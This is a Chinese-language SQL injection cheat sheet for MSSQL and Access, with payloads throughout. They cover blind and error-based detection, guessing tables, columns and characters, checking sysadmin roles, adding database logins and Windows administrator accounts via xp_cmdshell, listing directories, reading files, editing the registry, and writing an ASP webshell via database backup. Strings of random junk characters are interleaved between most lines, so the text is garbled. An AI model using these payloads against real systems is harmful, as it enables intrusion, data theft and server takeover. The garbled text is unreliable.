1.判断是否有注入（布尔盲注）：;and 1=1 与 ;and 1=2  两次请求返回页面不同，说明参数被带入了查询
2.初步判断是否是mssql：;and user>0  （user 是 nvarchar，与整数比较会触发类型转换错误，报错信息中带出当前数据库用户名；前提是页面会回显数据库错误）
D
gY2:&0
3.注入参数是字符型时：'and [查询条件] and ''='
N:d`L+tcc
4.搜索框未过滤参数时：'and [查询条件] and '%25'='  （%25 是 URL 编码后的 %，用来闭合 LIKE '%...%' 的模式）
%OfaBv&
5.判断数据库系统（按各自系统表是否存在来区分）
ztgSd8GGE
;and (select count(*) from sysobjects)>0  -- 成立则为 mssql
B\KvKT|\
;and (select count(*) from msysobjects)>0  -- 成立则为 access（access 默认对 msysobjects 无读权限，此时返回的报错信息同样可作为判断依据）
`Kpn@Xg
Sw%=/ g
SL pd~ZC?
6.猜表名：;and (select Count(*) from [表名])>0  （from 后面填的是表名而不是数据库名，成立说明该表存在）
7$Bq.Lc#z
7.猜字段名：;and (select Count(字段名) from 表名)>0
mJ#u] tiL
8.猜字段中记录长度：;and (select top 1 len(字段名) from 表名)>0  （改变比较值二分即可；top 1 未加 order by，取到的行不保证固定，最好加 where 条件锁定某一行）
%$`pD
I )
9.(1)猜字段的ascii值(access)
35B0L.R
;and (select top 1 asc(mid(字段名,1,1)) from 表名)>0  （调整 mid 的起始位置逐字符猜解，用 >、< 二分比较）
EXS
1.3>
(2)猜字段的ascii值(mssql)
;5PXPpJ
;and (select top 1 unicode(substring(字段名,1,1)) from 表名)>0
+QtK
"5M
10.测试权限结构(mssql)：IS_SRVROLEMEMBER 返回 1 表示当前登录属于该服务器角色；IS_MEMBER 判断的是当前数据库内的角色
~U~KUL|
_?Rprmjx}
Y71io^td~j
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
w/~,mzM"
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
dF5EIPl;J
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
HB||'gIC
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
eqZ V/a
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
]A5FN4 E
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
pLDseEr<
;and 1=(select IS_MEMBER('db_owner'));--
C6M|A3^T
crz )F"
i"0^Gr
11.添加mssql登录和系统帐户（需要当前连接具备 sysadmin 权限；xp_cmdshell 在较新版本中默认是禁用的，需先启用才能执行系统命令）
(Z,v)TOXjV
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,username,password;--
GXYmJ4wR
;exec master.dbo.sp_addsrvrolemember username,sysadmin;--  （参数顺序是 @loginame 在前、@rolename 在后，原文把两者写反了）
HIk5Q'e k
;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
-iR}kP|
;exec master.dbo.xp_cmdshell 'net user username password /add';--
?x3
<wW#Wnc ]
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
#OqQD6
plh.-"
I
^?TabL
12.(1)遍历目录（把 xp_dirtree 的结果存进自建表，再逐行爆出）
Rf^$?D&^
;create table dirs(paths varchar(100), id int)  -- xp_dirtree 'c:\' 返回 (subdirectory, depth) 两列，与这两列对应；目录名超过 100 字符会导致插入报错，可适当加大长度
~-.}]N+([
;insert dirs exec master.dbo.xp_dirtree 'c:\'
o:.={)rX
;and (select top 1 paths from dirs)>0  （varchar 与 int 比较触发转换错误，报错信息中带出目录名）
MT[V1I{LV
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>0  （原文末尾的 ">)" 是笔误，应为 ">0"；把已得到的目录名逐个加进 not in 列表，继续爆下一个）
Nv,1F
^vn8s~#
^ r-F@$:.
(2)遍历目录（用一张多列临时表接收各扩展存储过程的输出）
MCZTeYnx
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
#
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器（返回 4 列，正好对应 temp 的 4 列）
6}6;%{p"Gu
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表
@%d g0F}h
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树结构
|L}zB,
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容（xp_cmdshell 的每一行输出占一行）
~Z9Eb|B
lr'h
|`+kZ-M*
13.mssql中操作注册表的扩展存储过程
(
'r~,~AI
xp_regenumvalues 注册表根键, 子键
tJ>%Xop
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run'  以多个记录集方式返回该子键下所有键值
]VtVw^ ir
xp_regread 根键,子键,键值名
4y\qJw)~U
;exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir'  返回指定键值的内容
^,*ED Yz
xp_regwrite 根键,子键, 值名, 值类型, 值
t2skg
常用的值类型有两种：REG_SZ 表示字符串，REG_DWORD 表示整型
:)o 4fOJ8
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello'  写入注册表
ZKy)F-yX
xp_regdeletevalue 根键,子键,值名
cyrVz4_a
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName'  删除某个值
]L+YnZ?6
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey'  删除键，包括该键下的所有值
QK% Nt
5$f
vI#NO<
Uc%n{
a-a
14.利用 mssql 的 backup 写 webshell（需要 SQL Server 服务帐户对 web 目录有写权限；生成的文件是数据库备份文件，表内容夹在备份格式的二进制数据之间）
+`tl<rg;
use model
%J(y2 }
create table cmd(str image);
p)6!GdT
insert into cmd(str) values ('');  -- 引号内应填写要写入的 asp 代码；本文副本中该内容已丢失，只剩空串占位
,jqW<
Z6s-n$dSm
backup database model to disk='c:\l.asp';
`EKmp|B_p_
G &,1 NjSi
b3R1L|@
15.mssql内置函数（均利用与整数比较时的转换错误把结果带进报错信息）
G"k.sRKu
;and (select @@version)>0  爆出 @@version（内容是 SQL Server 的版本信息，其中也包含所在 Windows 的版本）
qE B3Y54+
;and user_name()='dbo'  判断当前连接在本库中是否映射为 dbo（sa 以及其他拥有该库的登录都会返回 dbo，不能仅凭此断定是 sa；确认是否 sysadmin 应使用第 10 节的 IS_SRVROLEMEMBER('sysadmin')）
T8<pb^#
;and (select user_name())>0  爆出当前连接的数据库用户名
s?Lx\?T
;and (select db_name())>0  得到当前连接的数据库名
tfB}U.
.#^ta9^t7
?tzJ7PJ~B
16.简洁的webshell（与第 14 节完全相同，只是备份输出路径换成了 web 目录）
5
0lpkG
="&r
use model
Lx%*IE|c
create table cmd(str image);
y7CC5S?
insert into cmd(str) values ('');  -- 引号内应填写要写入的 asp 代码；本文副本中该内容已丢失，只剩空串占位
S]!s)q-- z
backup database model to disk='g:\wwwtest\l.asp';